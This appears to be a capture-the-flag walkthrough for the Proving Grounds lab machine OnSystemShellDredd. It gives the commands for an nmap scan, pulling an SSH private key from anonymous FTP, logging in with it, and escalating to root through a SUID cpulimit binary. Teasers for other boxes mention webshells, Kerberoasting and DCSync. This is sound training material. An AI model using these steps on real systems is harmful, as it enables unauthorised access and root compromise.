This is a walkthrough of the machine OnSystemShellDredd from OffSec's Proving Grounds Play labs.

Machine information:

Level: Easy
Community rating: Easy
Flags: 2
OS: Linux
Vector: FTP, local

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

‍

Starting off with an Nmap scan, we discover the following open ports:

21 - FTP
61000 - SSH

Initial access

Based on the Nmap scan and the NSE script output, anonymous login on FTP is allowed.

Looking at what's available, we discover a hidden directory named .hannah, with a private SSH key inside:

To obtain initial access, we will download the private SSH key, assign it correct permissions, and SSH in as hannah (note the non-standard SSH port) to obtain the first local.txt flag:

get id_rsa

‍

chmod 600 id_rsa

‍

ssh hannah@<IP> -i id_rsa -p 61000

‍

Privilege escalation

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/bin/cpulimit:

find / -perm -u=s -type f 2>/dev/null

‍

We can abuse this to escalate privileges by running:

cpulimit -l 100 -f -- /bin/sh -p

‍

‍

An easy-rated Windows box involving default credentials for initial access into Apache Tomcat, and creating an application with a JSP webshell to obtain code execution as SYSTEM.

A medium-rated active directory box which involves chaining rights abuses to compromise users, gain access to FTP to discover a Password Safe file and execute a targeted Kerberoast and DCSync attack to compromise the domain.

An easy-rated active directory box involving LDAP and plaintext credentials for initial access, and abusing services to run a malicious image and obtain a SYSTEM shell.

Proving Grounds - OnSystemShellDredd Writeup

This lab challenges you to exploit an exposed FTP service to uncover a hidden SSH private key, granting initial access to the system. From there, privilege escalation is achieved by leveraging a misconfigured SUID binary, cpulimit, to execute arbitrary commands as root.

Nmap

Initial access

Privilege escalation